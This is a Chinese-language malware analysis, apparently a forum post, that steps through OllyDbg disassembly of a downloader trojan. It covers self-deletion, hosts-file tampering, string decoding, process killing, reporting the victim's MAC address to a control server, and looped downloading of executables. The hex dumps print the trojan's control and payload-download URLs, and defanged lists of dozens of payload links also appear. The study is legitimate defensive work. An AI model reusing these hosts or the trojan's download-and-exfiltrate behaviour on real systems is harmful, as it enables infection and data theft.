00409D9C 68 74B84000 push 40B874 ; ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1
\Temp\~228278.ex"
00409DA1 FFD6 call esi ; KERNEL32.MoveFileExA
不是毁尸灭迹过了吗?
0012FE10 00409DC1 /CALL 到 MoveFileExA 来自 复件_a.00409DBF
0012FE14 0012FE2C |ExistingName = "C:\Documents and Settings\Administrator\桌面\复件 a.exe"
0012FE18 00000000 |NewName = NULL
0012FE1C 00000004 \Flags = DELAY_UNTIL_REBOOT
猥琐的自删除...可惜有OD在 ^_^
00409DCD 8B35 A4104000 mov esi,dword ptr ds:[4010A4] ; USER32.GetMessageA
00409DD3 53 push ebx
00409DD4 53 push ebx
00409DD5 8D45 CC lea eax,dword ptr ss:[ebp-34]
00409DD8 53 push ebx
00409DD9 50 push eax
00409DDA FFD6 call esi
00409DDC 85C0 test eax,eax
00409DDE 74 1D je short 00409DFD ; 00409DFD
00409DE0 8D45 CC lea eax,dword ptr ss:[ebp-34]
00409DE3 50 push eax
00409DE4 FF15 A0104000 call dword ptr ds:[4010A0] ; USER32.TranslateMessage
00409DEA 8D45 CC lea eax,dword ptr ss:[ebp-34]
00409DED 50 push eax
00409DEE FF15 90104000 call dword ptr ds:[401090] ; USER32.DispatchMessageA
00409DF4 53 push ebx
00409DF5 53 push ebx
00409DF6 8D45 CC lea eax,dword ptr ss:[ebp-34]
00409DF9 53 push ebx
00409DFA 50 push eax
00409DFB ^ EB DD jmp short 00409DDA ; 00409DDA
进入消息循环.恩,这家伙的苦力活终于干完了.
;>>>>>>>>>>>>>>>>>>>>>>>
B.EXE为功能下载者.分析如下:
;>>>>>>>>>>>>>>>>>>>>>>>
004014A2 FF15 28104000 call dword ptr ds:[401028] ; KERNEL32.GetSystemDirectoryA
004014A8 8B3D 24104000 mov edi,dword ptr ds:[401024] ; KERNEL32.lstrcatA
004014AE 8D85 74FEFFFF lea eax,dword ptr ss:[ebp-18C]
004014B4 68 D8114000 push 4011D8 ; ASCII "\drivers\etc\hosts"
004014B9 50 push eax
004014BA FFD7 call edi
004014BC 8D85 74FEFFFF lea eax,dword ptr ss:[ebp-18C]
004014C2 68 80000000 push 80
004014C7 50 push eax
004014C8 FF15 20104000 call dword ptr ds:[401020] ; KERNEL32.SetFileAttributesA
一开场立马抚摸以下HOST
0040191F 8AC3 mov al,bl
00401921 B1 03 mov cl,3
00401923 2C 27 sub al,27
00401925 8BFE mov edi,esi
00401927 F6E9 imul cl
00401929 000433 add byte ptr ds:[ebx+esi],al
0040192C 83C9 FF or ecx,FFFFFFFF
0040192F 33C0 xor eax,eax
00401931 43 inc ebx
00401932 F2:AE repne scas byte ptr es:[edi]
00401934 F7D1 not ecx
00401936 49 dec ecx
00401937 3BD9 cmp ebx,ecx
00401939 ^ 72 D2 jb short 0040190D ; 0040190D
0040193B 5D pop ebp
字符串解码.风格和主EXE一样,一看就是一个人写的...函数地址为004018F0
解码结果:
00401208 75 73 65 72 69 6E 69 74 2E 65 78 65 00 00 00 00 userinit.exe....
0040153A 68 24124000 push 401224 ; ASCII "ghjgh"
0040153F 6A 01 push 1
00401541 53 push ebx
00401542 FF15 14104000 call dword ptr ds:[401014] ; KERNEL32.CreateMutexA
创建ghjgh互斥
00401771 68 A0124000 push 4012A0 ; ASCII "GetTempPathA"
00401776 56 push esi
00401777 FF15 34104000 call dword ptr ds:[401034] ; KERNEL32.GetProcAddress
又找临时目录.不用想,肯定准备干坏事.
00401569 FF15 08104000 call dword ptr ds:[401008] ; KERNEL32.GetTickCount
0040156F 50 push eax
00401570 56 push esi
00401571 68 18124000 push 401218 ; ASCII "%s~%x.dat"
00401576 68 DC244000 push 4024DC ; ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1
\Temp\~3deca9.dat"
0040157B FF15 60104000 call dword ptr ds:[401060] ; USER32.wsprintfA
又产生随机数...给.DAT文件命名.
0040158E FF15 28104000 call dword ptr ds:[401028] ; KERNEL32.GetSystemDirectoryA
00401594 53 push ebx
00401595 53 push ebx
00401596 53 push ebx
00401597 68 95234000 push 402395
0040159C 53 push ebx
0040159D 53 push ebx
0040159E FF15 04104000 call dword ptr ds:[401004] ; KERNEL32.CreateThread
获取系统目录,紧接着创建线程.402395是函数头.
004015C3 8B35 64104000 mov esi,dword ptr ds:[401064] ; USER32.GetMessageA
004015C9 53 push ebx
004015CA 53 push ebx
004015CB 8D45 D8 lea eax,dword ptr ss:[ebp-28]
004015CE 53 push ebx
004015CF 50 push eax
004015D0 FFD6 call esi
004015D2 85C0 test eax,eax
004015D4 74 1D je short 004015F3 ; 004015F3
004015D6 8D45 D8 lea eax,dword ptr ss:[ebp-28]
004015D9 50 push eax
004015DA FF15 68104000 call dword ptr ds:[401068] ; USER32.TranslateMessage
004015E0 8D45 D8 lea eax,dword ptr ss:[ebp-28]
004015E3 50 push eax
004015E4 FF15 70104000 call dword ptr ds:[401070] ; USER32.DispatchMessageA
004015EA 53 push ebx
004015EB 53 push ebx
004015EC 8D45 D8 lea eax,dword ptr ss:[ebp-28]
004015EF 53 push ebx
004015F0 50 push eax
004015F1 ^ EB DD jmp short 004015D0 ; 004015D0
004015F3 5F pop edi
又是消息循环.直接看402395.
009EFF98 71 71 2E 65 78 65 00 B2 qq.exe.
009EFFA8 63 6D 64 2E 65 78 65 00 cmd.exe.
解码
00401120 68 74 74 70 3A 2F 2F 74 67 2E 66 73 30 38 2E 63 http://tg.fs08.c
00401130 6E 2F 63 32 2F 67 65 74 6D 61 63 2E 61 73 70 00 n/c2/getmac.asp.
看名字应该是MAC统计
00402420 FF15 18104000 call dword ptr ds:[401018] ; KERNEL32.lstrcmpiA
009EFE64 009EFE9C |String1 = "[System Process]"
009EFE68 009EFFA0 \String2 = "qq.exe"
找QQ进程.想干嘛?
009EFE64 009EFE9C |String1 = "[System Process]"
009EFE68 009EFFA8 \String2 = "cmd.exe"
找CMD.想干嘛?
0040245E FFB5 CCFEFFFF push dword ptr ss:[ebp-134]
00402464 57 push edi
00402465 6A 01 push 1
00402467 E8 B4F3FFFF call 00401820 ; 00401820
0040246C 57 push edi
0040246D 50 push eax
0040246E FF15 44104000 call dword ptr ds:[401044] ; KERNEL32.TerminateProcess
00402474 8D85 C4FEFFFF lea eax,dword ptr ss:[ebp-13C]
想干掉...
004018BF 8BF0 mov esi,eax
004018C1 68 E4124000 push 4012E4 ; ASCII "Process32Next"
004018C6 56 push esi
004018C7 FF15 34104000 call dword ptr ds:[401034] ; KERNEL32.GetProcAddress
猥琐的循环
00402489 68 30750000 push 7530
0040248E E8 BDF1FFFF call 00401650 ; 00401650
00402493 ^ E9 4AFFFFFF jmp 004023E2 ; 004023E2
睡30秒继续循环.....看来不能让他睡,把前面的跳转改掉,反正这里他怎么找也找不到.
这里发现如果没有找到QQ的进程就会直接退出,无奈,我只好欺骗1下下他的感情,告诉他已经找到了.
0040241F 50 push eax
00402420 FF15 18104000 call dword ptr ds:[401018] ; KERNEL32.lstrcmpiA
00402426 85C0 test eax,eax
00402428 75 1F jnz short 00402449 ; 00402449
0040242A 68 E4134000 push 4013E4 ; ASCII "zQz"
0040242F 68 C8244000 push 4024C8
00402434 68 E0104000 push 4010E0 ; ASCII "x2"
00402439 56 push esi
0040243A C745 FC 0100000>mov dword ptr ss:[ebp-4],1
00402441 E8 E4F6FFFF call 00401B2A ; 00401B2A
改掉00402428的跳转,让他不跳,表示找到了,接着跟
009EFDF0 00 00 00 00 00 00 00 00 00 00 00 00 49 6E 74 65 ............Inte
009EFE00 72 6E 65 74 43 6C 6F 73 65 48 61 6E 64 6C 65 00 rnetCloseHandle.
009EFE10 49 6E 74 65 72 6E 65 74 4F 70 65 6E 55 72 6C 41 InternetOpenUrlA
009EFE20 00 FD 9E 00 49 6E 74 65 72 6E 65 74 4F 70 65 6E .秊.InternetOpen
009EFE30 41 00 00 00 77 69 6E 69 6E 65 74 2E 64 6C 6C 00 A...wininet.dll.
解码字符串.
009EFCF8 68 74 74 70 3A 2F 2F 74 67 2E 66 73 30 38 2E 63 http://tg.fs08.c
009EFD08 6E 2F 63 32 2F 67 65 74 6D 61 63 2E 61 73 70 3F n/c2/getmac.asp?
009EFD18 78 3D 26 79 3D 78 32 26 74 3D 7A 51 7A 26 7A 3D x=&y=x2&t=zQz&z=
009EFD28 36 39 38 64 35 31 26 6D 3D 00 79 00 73 00 74 00 698d51&m=.y.s.t.
009EFD38 65 00 6D 00 00 00 00 00 00 00 00 00 00 e.m..........
拼装字符串,顺便访问.
0012FE00 55 52 4C 44 6F 77 6E 6C 6F 61 64 54 6F 46 69 6C URLDownloadToFil
0012FE10 65 41 00 7C 75 72 6C 6D 6F 6E 2E 64 6C 6C 00 eA.|urlmon.dll.
解码出URLDownloadToFileA,要开工了...
0012FDB0 00401F45 返回到 ~228278.00401F45 来自 URLMON.URLDownloadToFileA
0012FDB4 00000000
0012FDB8 00401078 ASCII "http://txt.ykwoo.com/xx.txt"
0012FDBC 004024DC ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~4d899c.dat"
将此TXT下载为.DAT
00401F38 53 push ebx
00401F39 53 push ebx
00401F3A 57 push edi
00401F3B FF75 08 push dword ptr ss:[ebp+8]
00401F3E 53 push ebx
00401F3F FF15 BC254000 call dword ptr ds:[4025BC] ; URLMON.URLDownloadToFileA
00401F45 3BC3 cmp eax,ebx
00401F47 A3 D4114000 mov dword ptr ds:[4011D4],eax
00401F4C 74 10 je short 00401F5E ; 00401F5E
00401F4E 68 E02E0000 push 2EE0
00401F53 E8 F8F6FFFF call 00401650 ; 00401650
00401F58 46 inc esi
00401F59 3B75 10 cmp esi,dword ptr ss:[ebp+10]
00401F5C ^ 7C DA jl short 00401F38 ; 00401F38
循环下载.我手工下载了一下,内容如下:
添加无用符号,防止误点
http:--//ri.nutua.com/img/1.exe
http:--//ri.nutua.com/img/2.exe
http:--//ri.nutua.com/img/3.exe
http:--//ri.nutua.com/img/4.exe
http:--//ri.nutua.com/img/5.exe
http:--//ri.nutua.com/img/6.exe
http:--//ri.nutua.com/img/7.exe
http:--//ri.nutua.com/img/8.exe
http:--//ri.nutua.com/img/9.exe
http:--//ri.nutua.com/img/10.exe
http:--//ri.nutua.com/img/11.exe
http:--//ri.nutua.com/img/12.exe
http:--//ri.nutua.com/img/13.exe
http:--//ri.nutua.com/img/14.exe
http:--//ri.nutua.com/img/15.exe
http:--//ri.nutua.com/img/16.exe
http:--//ri.nutua.com/img/17.exe
http:--//ri.nutua.com/img/18.exe
http:--//ri.nutua.com/img/19.exe
http:--//ri.nutua.com/img/20.exe
http:--//ri.nutua.com/img/21.exe
http:--//ri.nutua.com/img/22.exe
http:--//ri.nutua.com/img/23.exe
http:--//ri.nutua.com/img/24.exe
http:--//ri.nutua.com/img/25.exe
http:--//ri.nutua.com/img/26.exe
http:--//ri.nutua.com/img/27.exe
http:--//ri.nutua.com/img/28.exe
http:--//ri.nutua.com/img/29.exe
http:--//ri.nutua.com/img/30.exe
http:--//ri.nutua.com/img/31.exe
http:--//ri.nutua.com/img/32.exe
http:--//ri.nutua.com/img/33.exe
http:--//ri.nutua.com/img/34.exe
http:--//ri.nutua.com/img/35.exe
http:--//ri.nutua.com/img/36.exe
http:--//ri.nutua.com/img/37.exe
http:--//ri.nutua.com/img/38.exe
http:--//ri.nutua.com/img/39.exe
0012FDCC 004017C8 /CALL 到 DeleteFileA 来自 ~228278.004017C6
0012FDD0 004025C4 \FileName = "C:\WINDOWS\system32\drivers\etc\hosts"
删掉HOSTS...
0012FDD4 004010EC ASCII "http://txt.ykwoo.com/ad.txt"
又要下载....
0040198C 68 10134000 push 401310 ; ASCII "Netbios"
00401991 68 00134000 push 401300 ; ASCII "NETAPI32.dll"
00401996 E8 AFFFFFFF call 0040194A ; 0040194A
004024C8 30 30 2D 30 43 2D 32 39 2D 39 44 2D 43 31 2D 35 00-0C-29-9D-C1-5
004024D8 35 5
获取MAC
0012FC70 68 74 74 70 3A 2F 2F 74 67 2E 66 73 30 38 2E 63 http://tg.fs08.c
0012FC80 6E 2F 77 31 2F 67 65 74 6D 61 63 2E 61 73 70 3F n/w1/getmac.asp?
0012FC90 78 3D 30 30 2D 30 43 2D 32 39 2D 39 44 2D 43 31 x=00-0C-29-9D-C1
0012FCA0 2D 35 35 26 79 3D 78 32 26 7A 3D 36 39 38 64 35 -55&y=x2&z=698d5
0012FCB0 31 26 6D 3D 31 34 35 34 1&m=1454
把网卡信息发过去.
00401078 68 74 74 70 3A 2F 2F 74 78 74 2E 79 6B 77 6F 6F http://txt.ykwoo
00401088 2E 63 6F 6D 2F 78 78 2E 74 78 74 00 00 00 00 00 .com/xx.txt.....
00401098 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
004010A8 00 00 00 00 68 74 74 70 3A 2F 2F 74 67 2E 66 73 ....http://tg.fs
004010B8 30 38 2E 63 6E 2F 77 31 2F 67 65 74 6D 61 63 2E 08.cn/w1/getmac.
004010C8 61 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 asp.............
004010D8 00 00 00 00 00 00 00 00 78 32 00 00 00 00 00 00 ........x2......
004010E8 00 00 00 00 68 74 74 70 3A 2F 2F 74 78 74 2E 79 ....http://txt.y
004010F8 6B 77 6F 6F 2E 63 6F 6D 2F 61 64 2E 74 78 74 00 kwoo.com/ad.txt.
00401108 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00401118 00 00 00 00 00 00 00 00 68 74 74 70 3A 2F 2F 74 ........http://t
00401128 67 2E 66 73 30 38 2E 63 6E 2F 63 32 2F 67 65 74 g.fs08.cn/c2/get
00401138 6D 61 63 2E 61 73 70 00 00 00 00 00 00 00 00 00 mac.asp.........
00401148 00 00 00 00 00 00 00 00 00 00 00 00 1E 00 00 00 ...............
00401158 68 74 74 70 3A 2F 2F 64 2E 6E 64 78 77 71 2E 63 http://d.ndxwq.c
00401168 6F 6D 2F 78 78 2E 65 78 65 00 00 00 00 00 00 00 om/xx.exe.......
00401178 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00401188 00 00 00 00 36 39 38 64 35 31 00 00 00 00 00 00 ....698d51......
00401198 00 00 00 00 0A 00 00 00 68 74 74 70 3A 2F 2F 64 ........http://d
004011A8 2E 6E 64 78 77 71 2E 63 6F 6D 2F 74 2F 78 32 2E .ndxwq.com/t/x2.
004011B8 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00 00 exe.............
004011C8 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ...............
004011D8 5C 64 72 69 76 65 72 73 5C 65 74 63 5C 68 6F 73 \drivers\etc\hos
004011E8 74 73 00 00 00 00 00 00 43 6F 6E 73 6F 6C 65 57 ts......ConsoleW
004011F8 69 6E 64 6F 77 43 6C 61 73 73 00 00 63 6D 64 00 indowClass..cmd.
00401208 75 73 65 72 69 6E 69 74 2E 65 78 65 00 00 00 00 userinit.exe....
00401218 25 73 7E 25 78 2E 64 61 74 00 00 00 67 68 6A 67 %s~%x.dat...ghjg
00401228 68 00 00 00 BA EA DF D8 D8 D8 C8 D2 00 00 00 00 h...宏哓刎纫....
00401238 65 78 65 00 57 69 6E 45 78 65 63 00 6B 65 72 6E exe.WinExec.kern
00401248 65 6C 33 32 2E 64 6C 6C 00 00 00 00 53 6C 65 65 el32.dll....Slee
00401258 70 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C p...KERNEL32.DLL
00401268 00 00 00 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 ....FindWindowA.
00401278 55 53 45 52 33 32 2E 44 4C 4C 00 00 50 6F 73 74 USER32.DLL..Post
00401288 4D 65 73 73 61 67 65 41 00 00 00 00 4D 65 73 73 MessageA....Mess
00401298 61 67 65 42 6F 78 41 00 47 65 74 54 65 6D 70 50 ageBoxA.GetTempP
004012A8 61 74 68 41 00 00 00 00 44 65 6C 65 74 65 46 69 athA....DeleteFi
004012B8 6C 65 41 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 leA.CloseHandle.
004012C8 4F 70 65 6E 50 72 6F 63 65 73 73 00 50 72 6F 63 OpenProcess.Proc
004012D8 65 73 73 33 32 46 69 72 73 74 00 00 50 72 6F 63 ess32First..Proc
004012E8 65 73 73 33 32 4E 65 78 74 00 00 00 25 64 00 00 ess32Next...%d..
004012F8 2A 00 00 00 39 39 00 00 4E 45 54 41 50 49 33 32 *...99..NETAPI32
00401308 2E 64 6C 6C 00 00 00 00 4E 65 74 62 69 6F 73 00 .dll....Netbios.
循环解码,批量下载运行再下载再运行.天生干苦力的
添加无用符号,防止误点
http:--//txt.ykwoo.com/xx.txt
http:--//txt.ykwoo.com/ad.txt
http:--//d.ndxwq.com/t/x2.exe
http:--//d.ndxwq.com/xx.exe
后面的活就交给这些链接里面的木马去干了.
[课程]FART 脱壳王!加量不加价!FART作者讲授!